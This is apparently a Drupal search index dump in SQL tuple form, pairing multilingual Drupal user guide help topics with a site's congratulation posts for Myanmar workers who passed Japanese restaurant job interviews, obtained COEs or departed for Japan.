(78, 'ja', 'node_search', ' congratulations 1362024  congratulations 1362024 admin tue 6252024 1541 thu 6132024 900  おめで めでと でとう とうご うござ ござい ざいま います  nyein ei ei swe と ei ei mon が 2024 年 6 月 13 日に日 に日本 日本の 本の北 の北海 北海道 海道へ 道へ出 へ出発 出発し 発しま します おめで めでと でとう とうご うござ ござい ざいま います congrats to ei ei mon nyein ei ei swe  ', 0),
(78, 'ko', 'help_search', ' uninstalling an unused theme goal uninstall a theme that was previously installed but is no longer being used on the site steps in the manage administrative menu navigate to appearance  locate the theme that you want to uninstall in the installed themes section click the uninstall link to uninstall the theme if there is not an uninstall link the theme cannot be uninstalled because it is either being used as the site default theme being used as the administration theme  or is the base theme for another installed theme  ', 1787923659),
(79, 'en', 'help_search', ' configuring taxonomy goal create a taxonomy vocabulary and add a reference field for that vocabulary to a content entity see managing taxonomy for information about taxonomy and managing content structure for more on content entities who can configure a taxonomy vocabulary  users with the administer vocabularies and terms permission can configure a vocabulary to add a field in the administrative interface the core field ui module must be installed and you will also need the administer fields permission for the entity you are adding the field to steps in the manage administrative menu navigate to structure   taxonomy  click add vocabulary  in the name field enter a name for the vocabulary for example ingredients which is how it will be shown in the administrative interface optionally add a description click save  your vocabulary will be created and you will see the page that lists all the terms in this vocabulary optionally click add term to add a term to the new vocabulary in the name field enter the term name for example butter click save  you will receive a confirmation about the term you created you may optionally continue to add more terms if you have the field ui module installed follow the instructions on the related adding a reference field to an entity subtype topic to add a taxonomy reference field to the entity type of your choice the settings page will allow you to choose the vocabulary that you created as the vocabulary to reference you may also want to configure the display and form display of the new field see related topics  additional resources setting up a taxonomy drupal user guide  ', 1787923659),
(79, 'en', 'node_search', ' congratulations 262024  congratulations 262024 admin tue 6252024 1547 sun 6022024 900 congratulations congratulations to shin thant phyu yamin thet for departure to fukuoka city japan  ', 0),
(79, 'ja', 'help_search', ' configuring taxonomy goal create a taxonomy vocabulary and add a reference field for that vocabulary to a content entity see managing taxonomy for information about taxonomy and managing content structure for more on content entities who can configure a taxonomy vocabulary  users with the administer vocabularies and terms permission can configure a vocabulary to add a field in the administrative interface the core field ui module must be installed and you will also need the administer fields permission for the entity you are adding the field to steps in the manage administrative menu navigate to structure   taxonomy  click add vocabulary  in the name field enter a name for the vocabulary for example ingredients which is how it will be shown in the administrative interface optionally add a description click save  your vocabulary will be created and you will see the page that lists all the terms in this vocabulary optionally click add term to add a term to the new vocabulary in the name field enter the term name for example butter click save  you will receive a confirmation about the term you created you may optionally continue to add more terms if you have the field ui module installed follow the instructions on the related adding a reference field to an entity subtype topic to add a taxonomy reference field to the entity type of your choice the settings page will allow you to choose the vocabulary that you created as the vocabulary to reference you may also want to configure the display and form display of the new field see related topics  additional resources setting up a taxonomy drupal user guide  ', 1787923659),
(79, 'ko', 'help_search', ' configuring taxonomy goal create a taxonomy vocabulary and add a reference field for that vocabulary to a content entity see managing taxonomy for information about taxonomy and managing content structure for more on content entities who can configure a taxonomy vocabulary  users with the administer vocabularies and terms permission can configure a vocabulary to add a field in the administrative interface the core field ui module must be installed and you will also need the administer fields permission for the entity you are adding the field to steps in the manage administrative menu navigate to structure   taxonomy  click add vocabulary  in the name field enter a name for the vocabulary for example ingredients which is how it will be shown in the administrative interface optionally add a description click save  your vocabulary will be created and you will see the page that lists all the terms in this vocabulary optionally click add term to add a term to the new vocabulary in the name field enter the term name for example butter click save  you will receive a confirmation about the term you created you may optionally continue to add more terms if you have the field ui module installed follow the instructions on the related adding a reference field to an entity subtype topic to add a taxonomy reference field to the entity type of your choice the settings page will allow you to choose the vocabulary that you created as the vocabulary to reference you may also want to configure the display and form display of the new field see related topics  additional resources setting up a taxonomy drupal user guide  ', 1787923659),
(80, 'en', 'help_search', ' managing taxonomy what is taxonomy  taxonomy is used to classify website content one common example of taxonomy is the tags used to classify or categorize posts in a blog website a cooking website could use an ingredients taxonomy to classify recipes individual taxonomy items are known as terms  the blog tags or recipe ingredients in these examples and a set of terms is known as a vocabulary  the set of all blog post tags or the set of all recipe ingredients in these examples technically taxonomy terms are an entity type and the entity subtypes are the vocabularies see managing content structure for more on content entities like other entities taxonomy terms can have fields attached for instance you could set up an image field to contain an icon for each term an individual vocabulary can organize its terms in a hierarchy or it could be flat for example blog tags normally have a flat structure while a recipe ingredients vocabulary could be hierarchical for example tomatoes could be a subterm of vegetables and under tomatoes you could have green and red tomatoes taxonomy terms are normally attached as reference fields to other content entities which is how you can use them to classify content when you set up a taxonomy reference field you can let users enter terms in two ways free tagging new terms can be created right on the content editing form fixed list of terms the list of terms is curated and managed outside the content editing form and users can only select from the existing list when editing content taxonomy reference fields can be added to any entity such as user accounts content blocks or regular content items if you use them to classify regular content items your site will automatically be set up with taxonomy listing pages for each term each of these pages lists all of the content items that are classified with that term overview of managing taxonomy the core taxonomy module allows you to create and edit taxonomy vocabularies and taxonomy terms the core field ui module provides a user interface for adding fields to entities including the taxonomy reference field and configuring field editing and display see the related topics listed below for specific tasks additional resources concept taxonomy drupal user guide  ', 1787923659),
(80, 'en', 'node_search', ' congratulations 262024  congratulations 262024 admin tue 6252024 1609 sun 6022024 900 congratulations  on february 5 2024 two young daughters embarked on their journey to fukuoka japan demonstrating dedication to their health and work they consistently support their parents we wish them continued success and fulfillment in their roles as exemplary daughters congratulations to shin thant phyu yamin thet   congratulations shin thant phyu yamin thet for departure to fukuoka city japan  ', 0),
(80, 'ja', 'help_search', ' managing taxonomy what is taxonomy  taxonomy is used to classify website content one common example of taxonomy is the tags used to classify or categorize posts in a blog website a cooking website could use an ingredients taxonomy to classify recipes individual taxonomy items are known as terms  the blog tags or recipe ingredients in these examples and a set of terms is known as a vocabulary  the set of all blog post tags or the set of all recipe ingredients in these examples technically taxonomy terms are an entity type and the entity subtypes are the vocabularies see managing content structure for more on content entities like other entities taxonomy terms can have fields attached for instance you could set up an image field to contain an icon for each term an individual vocabulary can organize its terms in a hierarchy or it could be flat for example blog tags normally have a flat structure while a recipe ingredients vocabulary could be hierarchical for example tomatoes could be a subterm of vegetables and under tomatoes you could have green and red tomatoes taxonomy terms are normally attached as reference fields to other content entities which is how you can use them to classify content when you set up a taxonomy reference field you can let users enter terms in two ways free tagging new terms can be created right on the content editing form fixed list of terms the list of terms is curated and managed outside the content editing form and users can only select from the existing list when editing content taxonomy reference fields can be added to any entity such as user accounts content blocks or regular content items if you use them to classify regular content items your site will automatically be set up with taxonomy listing pages for each term each of these pages lists all of the content items that are classified with that term overview of managing taxonomy the core taxonomy module allows you to create and edit taxonomy vocabularies and taxonomy terms the core field ui module provides a user interface for adding fields to entities including the taxonomy reference field and configuring field editing and display see the related topics listed below for specific tasks additional resources concept taxonomy drupal user guide  ', 1787923659),
(80, 'ja', 'node_search', ' congratulations 262024  congratulations 262024 admin tue 6252024 1621 sun 6022024 900  おめで めでと でとう とうご うござ ござい ざいま います  2024 年 2 月 5 日 2 人の幼 の幼い 幼い娘 い娘が 娘が日 が日本 日本の 本の福 の福岡 福岡へ 岡への への旅 の旅に 旅に出 に出ま 出まし ました 健康と 康と仕 と仕事 仕事に 事に献 に献身 献身的 身的な 的な姿 な姿勢 姿勢を 勢を見 を見せ 見せな せなが ながら 彼女た 女たち たちは ちは両 は両親 両親を 親を常 を常に 常にサ にサポ サポー ポート ートし トして してい ていま います 模範的 範的な 的な娘 な娘と 娘とし として しての ての役 の役割 役割を 割を今 を今後 今後も 後も果 も果た 果たし 成功し 功し続 し続け 続ける けるこ ること ことを とをお をお祈 お祈り 祈りし りしま します  shin thant phyu yamin thet    おめで めでと でとう とうご うござ ござい ざいま います   congratulations shin thant phyu yamin thet for departure to fukuoka city japan  ', 0),
(80, 'ko', 'help_search', ' managing taxonomy what is taxonomy  taxonomy is used to classify website content one common example of taxonomy is the tags used to classify or categorize posts in a blog website a cooking website could use an ingredients taxonomy to classify recipes individual taxonomy items are known as terms  the blog tags or recipe ingredients in these examples and a set of terms is known as a vocabulary  the set of all blog post tags or the set of all recipe ingredients in these examples technically taxonomy terms are an entity type and the entity subtypes are the vocabularies see managing content structure for more on content entities like other entities taxonomy terms can have fields attached for instance you could set up an image field to contain an icon for each term an individual vocabulary can organize its terms in a hierarchy or it could be flat for example blog tags normally have a flat structure while a recipe ingredients vocabulary could be hierarchical for example tomatoes could be a subterm of vegetables and under tomatoes you could have green and red tomatoes taxonomy terms are normally attached as reference fields to other content entities which is how you can use them to classify content when you set up a taxonomy reference field you can let users enter terms in two ways free tagging new terms can be created right on the content editing form fixed list of terms the list of terms is curated and managed outside the content editing form and users can only select from the existing list when editing content taxonomy reference fields can be added to any entity such as user accounts content blocks or regular content items if you use them to classify regular content items your site will automatically be set up with taxonomy listing pages for each term each of these pages lists all of the content items that are classified with that term overview of managing taxonomy the core taxonomy module allows you to create and edit taxonomy vocabularies and taxonomy terms the core field ui module provides a user interface for adding fields to entities including the taxonomy reference field and configuring field editing and display see the related topics listed below for specific tasks additional resources concept taxonomy drupal user guide  ', 1787923659),
(81, 'en', 'help_search', ' taking tours of administrative pages goal take a tour of an administrative page what are tours  the core tour module provides users with tours  which are guided tours of the administrative interface each tour starts on a particular administrative page and consists of one or more tips that highlight elements of the page guide you through a workflow or explain key concepts users need access tour permission to view tours and javascript must be enabled in their browsers steps make sure that the core tour module is installed and that you have a role with the access tour permission also make sure that a toolbar module is installed either the core toolbar module or a contributed module replacement visit an administrative page that has a tour such as the edit view page provided by the core views ui module click the tour button at the right end of the toolbar left end for righttoleft languages the first tip of the tour should appear click the next button to advance to the next tip and end tour at the end to close the tour  ', 1787923659),
(81, 'en', 'node_search', ' congratulations for passing interview kaung myat soe  congratulations for passing interview kaung myat soe admin tue 6252024 1624 tue 6042024 900 congratulations  congratulations kaung myat soe for passing the interview for tokutei gaishoku restaurant with excellent points  ', 0),
(81, 'ja', 'help_search', ' taking tours of administrative pages goal take a tour of an administrative page what are tours  the core tour module provides users with tours  which are guided tours of the administrative interface each tour starts on a particular administrative page and consists of one or more tips that highlight elements of the page guide you through a workflow or explain key concepts users need access tour permission to view tours and javascript must be enabled in their browsers steps make sure that the core tour module is installed and that you have a role with the access tour permission also make sure that a toolbar module is installed either the core toolbar module or a contributed module replacement visit an administrative page that has a tour such as the edit view page provided by the core views ui module click the tour button at the right end of the toolbar left end for righttoleft languages the first tip of the tour should appear click the next button to advance to the next tip and end tour at the end to close the tour  ', 1787923659),
(81, 'ja', 'node_search', ' congratulations for passing interview kaung myat soe  congratulations for passing interview kaung myat soe admin tue 6252024 1629 tue 6042024 900  おめで めでと でとう とうご うござ ござい ざいま います  kaung myat soe さん 特選外 選外食 レスト ストラ トラン の面接 面接に 接に優 に優秀 優秀な 秀な成 な成績 成績で 績で合 で合格 合格し 格しま しまし ました おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(81, 'ko', 'help_search', ' taking tours of administrative pages goal take a tour of an administrative page what are tours  the core tour module provides users with tours  which are guided tours of the administrative interface each tour starts on a particular administrative page and consists of one or more tips that highlight elements of the page guide you through a workflow or explain key concepts users need access tour permission to view tours and javascript must be enabled in their browsers steps make sure that the core tour module is installed and that you have a role with the access tour permission also make sure that a toolbar module is installed either the core toolbar module or a contributed module replacement visit an administrative page that has a tour such as the edit view page provided by the core views ui module click the tour button at the right end of the toolbar left end for righttoleft languages the first tip of the tour should appear click the next button to advance to the next tip and end tour at the end to close the tour  ', 1787923659),
(82, 'en', 'help_search', ' creating a user account goal create a new user account steps in the manage administrative menu navigate to people  click add user  enter the email address   username  and password  twice for the new user verify that the roles checked for the new user are correct if you want the new user to receive an email message notifying them of the new account check notify user of new account  optionally change other settings on the form click create new account  you will be left on the add user page repeat these steps if you have more user accounts to create  ', 1787923659),
(82, 'en', 'node_search', ' congratulations to myo khant  congratulations to myo khant admin tue 6252024 1423 mon 5202024 900 congratulations  congratulations to myo khant in passing the interview for tokutei gaishoku restaurant  ', 0),
(82, 'ja', 'help_search', ' creating a user account goal create a new user account steps in the manage administrative menu navigate to people  click add user  enter the email address   username  and password  twice for the new user verify that the roles checked for the new user are correct if you want the new user to receive an email message notifying them of the new account check notify user of new account  optionally change other settings on the form click create new account  you will be left on the add user page repeat these steps if you have more user accounts to create  ', 1787923659),
(82, 'ja', 'node_search', ' myo khant おめで めでと でとう とうご うござ ござい ざいま います  myo khant おめで めでと でとう とうご うござ ござい ざいま います admin tue 6252024 1702 mon 5202024 900  おめで めでと でとう とうご うござ ござい ざいま います   特定外 定外食 レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格した myo khant さん おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(82, 'ko', 'help_search', ' creating a user account goal create a new user account steps in the manage administrative menu navigate to people  click add user  enter the email address   username  and password  twice for the new user verify that the roles checked for the new user are correct if you want the new user to receive an email message notifying them of the new account check notify user of new account  optionally change other settings on the form click create new account  you will be left on the add user page repeat these steps if you have more user accounts to create  ', 1787923659),
(83, 'en', 'help_search', ' adding a new role goal create a new role steps in the manage administrative menu navigate to people   roles  click add role  enter the desired role name  if desired click edit to change the machine name for the role click save  you should be returned to the roles page and your new role should be in the role list  ', 1787923659),
(83, 'en', 'node_search', ' congratulation for getting coe congratulation for getting coe admin tue 6252024 1659 wed 11062024 908 congratulations  congratulations for getting coe for khu richard li soung oo coe for khu richard and li soung oo  ', 0),
(83, 'ja', 'help_search', ' adding a new role goal create a new role steps in the manage administrative menu navigate to people   roles  click add role  enter the desired role name  if desired click edit to change the machine name for the role click save  you should be returned to the roles page and your new role should be in the role list  ', 1787923659),
(83, 'ja', 'node_search', ' congratulation for getting coe congratulation for getting coe admin tue 6252024 1708 wed 11062024 908   おめで めでと でとう   khu richard さんと li soung oo さんの coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います coe for khu richard and li soung oo  ', 0),
(83, 'ko', 'help_search', ' adding a new role goal create a new role steps in the manage administrative menu navigate to people   roles  click add role  enter the desired role name  if desired click edit to change the machine name for the role click save  you should be returned to the roles page and your new role should be in the role list  ', 1787923659),
(84, 'en', 'help_search', ' managing user accounts and site visitors what is a user  a user is anyone accessing or viewing your site anonymous users are users who are not logged in and authenticated users are users who are logged in what is a role  roles are used to group and classify users each user can be assigned one or more roles there are also special roles for all anonymous and all authenticated users what is a permission  granting a permission to a role allows users who have been assigned that role to perform an action on the site such as viewing content editing or creating a particular type of content administering settings for a particular module or using a particular function of the site such as search  overview of managing user accounts and visitors the core user module allows users to register log in and log out and administrators to manage user roles and permissions the core ban module allows administrators to ban certain ip addresses from accessing the site depending on which modules you have installed on your site the related topics below will help you with tasks related to managing user accounts and visitors  ', 1787923659),
(84, 'en', 'node_search', ' congratulations to ye mong aung  congratulations to ye mong aung admin tue 6252024 1705 wed 5292024 2100 congratulations  congratulations to ye mong aung in passing the interview for tokutei gaishoku restaurant  ', 0),
(84, 'ja', 'help_search', ' managing user accounts and site visitors what is a user  a user is anyone accessing or viewing your site anonymous users are users who are not logged in and authenticated users are users who are logged in what is a role  roles are used to group and classify users each user can be assigned one or more roles there are also special roles for all anonymous and all authenticated users what is a permission  granting a permission to a role allows users who have been assigned that role to perform an action on the site such as viewing content editing or creating a particular type of content administering settings for a particular module or using a particular function of the site such as search  overview of managing user accounts and visitors the core user module allows users to register log in and log out and administrators to manage user roles and permissions the core ban module allows administrators to ban certain ip addresses from accessing the site depending on which modules you have installed on your site the related topics below will help you with tasks related to managing user accounts and visitors  ', 1787923659),
(84, 'ja', 'node_search', ' ye mong aung おめで めでと でとう とうご うござ ござい ざいま います  ye mong aung おめで めでと でとう とうご うござ ござい ざいま います admin tue 6252024 1713 wed 5292024 2100  おめで めでと でとう とうご うござ ござい ざいま います   特定外 定外食 レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格した ye mong aung さん おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(84, 'ko', 'help_search', ' managing user accounts and site visitors what is a user  a user is anyone accessing or viewing your site anonymous users are users who are not logged in and authenticated users are users who are logged in what is a role  roles are used to group and classify users each user can be assigned one or more roles there are also special roles for all anonymous and all authenticated users what is a permission  granting a permission to a role allows users who have been assigned that role to perform an action on the site such as viewing content editing or creating a particular type of content administering settings for a particular module or using a particular function of the site such as search  overview of managing user accounts and visitors the core user module allows users to register log in and log out and administrators to manage user roles and permissions the core ban module allows administrators to ban certain ip addresses from accessing the site depending on which modules you have installed on your site the related topics below will help you with tasks related to managing user accounts and visitors  ', 1787923659),
(85, 'en', 'help_search', ' modifying the permissions for a role goal modify the permissions for an existing role steps in the manage administrative menu navigate to people   permissions  review the permissions for the role paying particular attention to the permissions marked with warning give to trusted roles only this permission has security implications uncheck permissions that this role should not have in the row of the permission and the column of the role check permissions that this role should have click save permissions   ', 1787923659),
(85, 'en', 'node_search', ' congratulations to paing myo zaw congratulations to paing myo zaw admin tue 6252024 1631 tue 6042024 900 congratulations  congratulations paing myo zaw for passing the interview tokutei gaishoku restaurant    ', 0),
(85, 'ja', 'help_search', ' modifying the permissions for a role goal modify the permissions for an existing role steps in the manage administrative menu navigate to people   permissions  review the permissions for the role paying particular attention to the permissions marked with warning give to trusted roles only this permission has security implications uncheck permissions that this role should not have in the row of the permission and the column of the role check permissions that this role should have click save permissions   ', 1787923659),
(85, 'ja', 'node_search', ' congratulations to paing myo zaw congratulations to paing myo zaw admin tue 6252024 1712 tue 6042024 900  おめで めでと でとう とうご うござ ござい ざいま います  paing myo zaw さん 特定外 定外食 外食面 食面接 面接合 接合格 合格お 格おめ おめで めでと でとう とうご うござ ござい ざいま います    ', 0),
(85, 'ko', 'help_search', ' modifying the permissions for a role goal modify the permissions for an existing role steps in the manage administrative menu navigate to people   permissions  review the permissions for the role paying particular attention to the permissions marked with warning give to trusted roles only this permission has security implications uncheck permissions that this role should not have in the row of the permission and the column of the role check permissions that this role should have click save permissions   ', 1787923659),
(86, 'en', 'help_search', ' configuring how user accounts are created and deleted goal configure settings related to how user accounts are created and deleted what are the settings related to user account creation and deletion  you can make it possible for new users to register themselves for accounts with or without email verification or administrative approval or you can make it so only administrators with administer users permission can register new users you can configure what happens to content that a user created if their account is canceled  deleted you can edit the email messages that are sent to users when their accounts are pending approved created blocked or canceled or when they request a password reset what are variables in email message text  variables are short text strings enclosed in square brackets that you can insert into configured email message text when an individual message is generated data from your site is substituted for the variables some commonlyused variables are site name the name of your website site url the url of your website site loginurl the url where users can log in to your site user displayname the user s displayed name user accountname the user s account name user mail the user s email alias user onetimeloginurl an expiring url that a user can use to log in once if they need to reset their password steps in the manage administrative menu navigate to configuration   people   account settings  select the method you want to use for creating user accounts and check or uncheck the box that requires email verification to match the settings you want for your site select the desired option for what happens to content that a user created if their account is canceled optionally edit the text of email messages related to user accounts verify that the other settings are correct click save configuration  you should see a message indicating that the settings were saved  ', 1787923659),
(86, 'en', 'node_search', ' congratulations for getting coe congratulations for getting coe admin tue 6252024 1714 thu 6062024 923 congratulations  congratulations la pyae aung for getting coe getting coe for la pyae aung  ', 0),
(86, 'ja', 'help_search', ' configuring how user accounts are created and deleted goal configure settings related to how user accounts are created and deleted what are the settings related to user account creation and deletion  you can make it possible for new users to register themselves for accounts with or without email verification or administrative approval or you can make it so only administrators with administer users permission can register new users you can configure what happens to content that a user created if their account is canceled  deleted you can edit the email messages that are sent to users when their accounts are pending approved created blocked or canceled or when they request a password reset what are variables in email message text  variables are short text strings enclosed in square brackets that you can insert into configured email message text when an individual message is generated data from your site is substituted for the variables some commonlyused variables are site name the name of your website site url the url of your website site loginurl the url where users can log in to your site user displayname the user s displayed name user accountname the user s account name user mail the user s email alias user onetimeloginurl an expiring url that a user can use to log in once if they need to reset their password steps in the manage administrative menu navigate to configuration   people   account settings  select the method you want to use for creating user accounts and check or uncheck the box that requires email verification to match the settings you want for your site select the desired option for what happens to content that a user created if their account is canceled optionally edit the text of email messages related to user accounts verify that the other settings are correct click save configuration  you should see a message indicating that the settings were saved  ', 1787923659),
(86, 'ja', 'node_search', ' congratulations for getting coe congratulations for getting coe admin tue 6252024 1721 thu 6062024 923 おめで めでと でとう la pyae aung さん coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います getting coe for la pyae aung  ', 0),
(86, 'ko', 'help_search', ' configuring how user accounts are created and deleted goal configure settings related to how user accounts are created and deleted what are the settings related to user account creation and deletion  you can make it possible for new users to register themselves for accounts with or without email verification or administrative approval or you can make it so only administrators with administer users permission can register new users you can configure what happens to content that a user created if their account is canceled  deleted you can edit the email messages that are sent to users when their accounts are pending approved created blocked or canceled or when they request a password reset what are variables in email message text  variables are short text strings enclosed in square brackets that you can insert into configured email message text when an individual message is generated data from your site is substituted for the variables some commonlyused variables are site name the name of your website site url the url of your website site loginurl the url where users can log in to your site user displayname the user s displayed name user accountname the user s account name user mail the user s email alias user onetimeloginurl an expiring url that a user can use to log in once if they need to reset their password steps in the manage administrative menu navigate to configuration   people   account settings  select the method you want to use for creating user accounts and check or uncheck the box that requires email verification to match the settings you want for your site select the desired option for what happens to content that a user created if their account is canceled optionally edit the text of email messages related to user accounts verify that the other settings are correct click save configuration  you should see a message indicating that the settings were saved  ', 1787923659),
(87, 'en', 'help_search', ' modifying or deleting a user account goal update or delete an existing user account steps in the manage administrative menu navigate to people  enter all or part of the user name or email address of the user account you want to update or delete and click filter  a short list of user accounts including the account of interest should be shown in the table if not modify the filter text until you can find the account of interest click edit in the operations area of the account of interest to delete the user account scroll to the bottom and click cancel account  select what you want to happen to the user s content on the next screen and click cancel account  to update the user account enter new values in the form and click save   ', 1787923659),
(87, 'en', 'node_search', ' things to beware while working in japan things to beware while working in japan admin tue 6252024 1729 thu 5302024 900 things to remember when you come to japan to work strictly respect working hours maintain morals in work no matter what kind of work you choose try to work hard learn to understand japanese work culture respect seniors at work listen carefully to the adults at work and work carefully and neatly at the workplace dress neatly and behave smartly continuously learn and improve japanese language speaking japanese get into the habit of going to bed early get enough sleep and get ready for work in the morning reduce using facebook at night completely get rid of the careless ideas of that s enough and replace them with clear and precise ideas of i will do my best carefully and thoroughly treat any business as if it were your own work and work hard to work hard for myanmar learn the dignity of good manners and make good sons and daughters who are proud of their parents let them show things to beware while in japan  ', 0),
(87, 'ja', 'help_search', ' modifying or deleting a user account goal update or delete an existing user account steps in the manage administrative menu navigate to people  enter all or part of the user name or email address of the user account you want to update or delete and click filter  a short list of user accounts including the account of interest should be shown in the table if not modify the filter text until you can find the account of interest click edit in the operations area of the account of interest to delete the user account scroll to the bottom and click cancel account  select what you want to happen to the user s content on the next screen and click cancel account  to update the user account enter new values in the form and click save   ', 1787923659),
(87, 'ja', 'node_search', ' things to beware while working in japan things to beware while working in japan admin tue 6252024 1718 thu 5302024 900  日本に 本に仕 に仕事 仕事で 事で来 で来る 来ると るとき ときに きに覚 に覚え 覚えて えてお ておく おくべ くべき べきこ きこと   労働時 働時間 時間を 間を厳 を厳守 厳守し 守して してく てくだ くださ ださい 仕事に 事にお におい おいて いて道 て道徳 道徳心 徳心を 心を持 を持ち どんな んな仕 な仕事 仕事を 事を選 を選ぶ 選ぶに ぶにし にして しても ても一 も一生 一生懸 生懸命 懸命働 命働く 働くよ くよう ように うに努 に努め 努めて めてく てくだ くださ ださい 日本の 本の仕 の仕事 仕事や 事や文 や文化 文化を 化を理 を理解 理解す 解する 職場で 場では では先 は先輩 先輩を 輩を尊 を尊敬 尊敬し 敬しま しまし ましょ しょう 職場の 場の大 の大人 大人の 人の言 の言う 言うこ うこと ことを とをよ をよく よく聞 く聞い 聞いて 丁寧に 寧にき にきれ きれい れいに いに仕 に仕事 仕事を 事をし をしま しまし ましょ しょう 職場で 場では ではき はきち きちん ちんと んとし とした した服 た服装 服装を 装をし スマー マート ートな トな振 な振る 振る舞 る舞い 舞いを いをし をしま しまし ましょ しょう 継続的 続的に 的に日 に日本 日本語 本語を 語を学 を学び 日本語 本語の 語の会 の会話 会話力 話力を 力を向 を向上 向上さ 上させ させま せます 早めに めに寝 に寝る 寝る習 る習慣 習慣を 慣をつ をつけ 十分な 分な睡 な睡眠 睡眠を 眠をと をとり 朝の仕 の仕事 仕事に 事に備 に備え 備えま えまし ましょ しょう 夜間の facebook の使用 使用を 用を完 を完全 完全に 全に減 に減ら 減らし らしま しまし ましょ しょう もう十 う十分 十分だ という 不注意 注意な 考えを えを捨 を捨て 慎重に 重に徹 に徹底 徹底的 底的に 的に最 に最善 最善を 善を尽 を尽く 尽くす という いう明 う明確 明確で 確で正 で正確 正確な 確な考 な考え 考えに えに置 に置き 置き換 き換え 換えて えてく てくだ くださ ださい いかな かなる なるビ るビジ ビジネ ジネス ネスも スも自 も自分 自分の 分の仕 の仕事 仕事で 事であ である あるか るかの かのよ のよう ように うに扱 に扱い 一生懸 生懸命 懸命働 命働き 働きま きまし ましょ しょう ミャン ャンマ ンマー マーの ーのた のため ために めに一 に一生 一生懸 生懸命 懸命働 命働き 礼儀正 儀正し 正しさ しさの さの尊 の尊厳 尊厳を 厳を学 を学び 親を誇 を誇り 誇りに りに思 に思う 思うよ うよう ような うな良 な良い 良い息 い息子 娘を育 を育て 育てま てまし ましょ しょう それを れを示 を示し 示しま しまし ましょ しょう things to beware while in japan  ', 0),
(87, 'ko', 'help_search', ' modifying or deleting a user account goal update or delete an existing user account steps in the manage administrative menu navigate to people  enter all or part of the user name or email address of the user account you want to update or delete and click filter  a short list of user accounts including the account of interest should be shown in the table if not modify the filter text until you can find the account of interest click edit in the operations area of the account of interest to delete the user account scroll to the bottom and click cancel account  select what you want to happen to the user s content on the next screen and click cancel account  to update the user account enter new values in the form and click save   ', 1787923659),
(88, 'en', 'help_search', ' adding a new display to an existing view goal add a new display to an existing view this will allow you to display similar data to an existing view using similar settings in a new block page feed etc steps if you are not already editing your view in the manage administrative menu navigate to structure   views  find the view you want to edit and click its edit link under displays  click add  in the popup list click the link for the type of display you want to add the most common types are page and block  the new display will be added to your view and you will be editing that display optionally click the link next to display name and enter a new name to be shown for this display in the administrative interface follow the steps in editing an existing view display to edit the other settings for the display  ', 1787923659),
(88, 'en', 'node_search', ' congratulation for getting coe congratulation for getting coe admin tue 6252024 1726 fri 5242024 930 congratulations  congratulations nilar aung tin zar win myint for getting coe congratulations nilar aung and tin zar win myint for getting coe  ', 0),
(88, 'ja', 'help_search', ' adding a new display to an existing view goal add a new display to an existing view this will allow you to display similar data to an existing view using similar settings in a new block page feed etc steps if you are not already editing your view in the manage administrative menu navigate to structure    ビュー   find the view you want to edit and click its edit link under displays  click add  in the popup list click the link for the type of display you want to add the most common types are page and block  the new display will be added to your view and you will be editing that display optionally click the link next to display name and enter a new name to be shown for this display in the administrative interface follow the steps in editing an existing view display to edit the other settings for the display  ', 1787923659),
(88, 'ja', 'node_search', ' congratulation for getting coe congratulation for getting coe admin tue 6252024 1729 fri 5242024 930 おめで めでと でとう nilar aung さんと tin zar さん coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います congratulations nilar aung and tin zar win myint for getting coe  ', 0),
(88, 'ko', 'help_search', ' adding a new display to an existing view goal add a new display to an existing view this will allow you to display similar data to an existing view using similar settings in a new block page feed etc steps if you are not already editing your view in the manage administrative menu navigate to structure    뷰   find the view you want to edit and click its edit link under displays  click add  in the popup list click the link for the type of display you want to add the most common types are page and block  the new display will be added to your view and you will be editing that display optionally click the link next to display name and enter a new name to be shown for this display in the administrative interface follow the steps in editing an existing view display to edit the other settings for the display  ', 1787923659),
(89, 'en', 'help_search', ' adding a bulk operations form to a view goal add one or more existing actions as bulk operations to an existing tablestyle view if you have the core actions ui module installed see the related topic configuring actions for more information about actions who can edit views  the core views ui module will need to be installed and you will need administer views permission in order to edit a view steps in the manage administrative menu navigate to structure   views  a list of all views is shown find the view that you would like to edit and click edit from the dropdown button note that bulk operations work best in a view with a page display and a table format if there is not already an operations bulk form in the fields list for the view click add in the fields section to add it the exact name of the bulk form field will vary and may contain keywords like bulk update form element or operations not to be confused with operations links  which are applied to each item in a row if the bulk operations field already exists click the field name to edit its settings check the action s you want to make available in the selected actions list and click apply all displays   verify that the access settings for the view are at least as restrictive as the permissions necessary to perform the bulk operations people with permission to see the view but who don t have permission to do the bulk operations will experience problems click save  the action s will be available as bulk operations in the view  ', 1787923659),
(89, 'en', 'node_search', ' congratulations for getting coe congratulations for getting coe admin tue 6252024 1730 thu 5232024 937 congratulations  congratulations thandar moe pyae sone aung for getting coe congratulations thandar moe and pyae sone aung for getting coe  ', 0),
(89, 'ja', 'help_search', ' adding a bulk operations form to a view goal add one or more existing actions as bulk operations to an existing tablestyle view if you have the core actions ui module installed see the related topic configuring actions for more information about actions who can edit views  the core views ui module will need to be installed and you will need administer views permission in order to edit a view steps in the manage administrative menu navigate to structure    ビュー   a list of all views is shown find the view that you would like to edit and click edit from the dropdown button note that bulk operations work best in a view with a page display and a table format if there is not already an operations bulk form in the fields list for the view click add in the fields section to add it the exact name of the bulk form field will vary and may contain keywords like bulk update form element or operations not to be confused with operations links  which are applied to each item in a row if the bulk operations field already exists click the field name to edit its settings check the action s you want to make available in the selected actions list and click apply all displays   verify that the access settings for the view are at least as restrictive as the permissions necessary to perform the bulk operations people with permission to see the view but who don t have permission to do the bulk operations will experience problems click save  the action s will be available as bulk operations in the view  ', 1787923659),
(89, 'ja', 'node_search', ' congratulations for getting coe congratulations for getting coe admin tue 6252024 1734 thu 5232024 937  おめで めでと でとう  thandar moe さんと pyae sone aung さん coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います congratulations thandar moe and pyae sone aung for getting coe  ', 0),
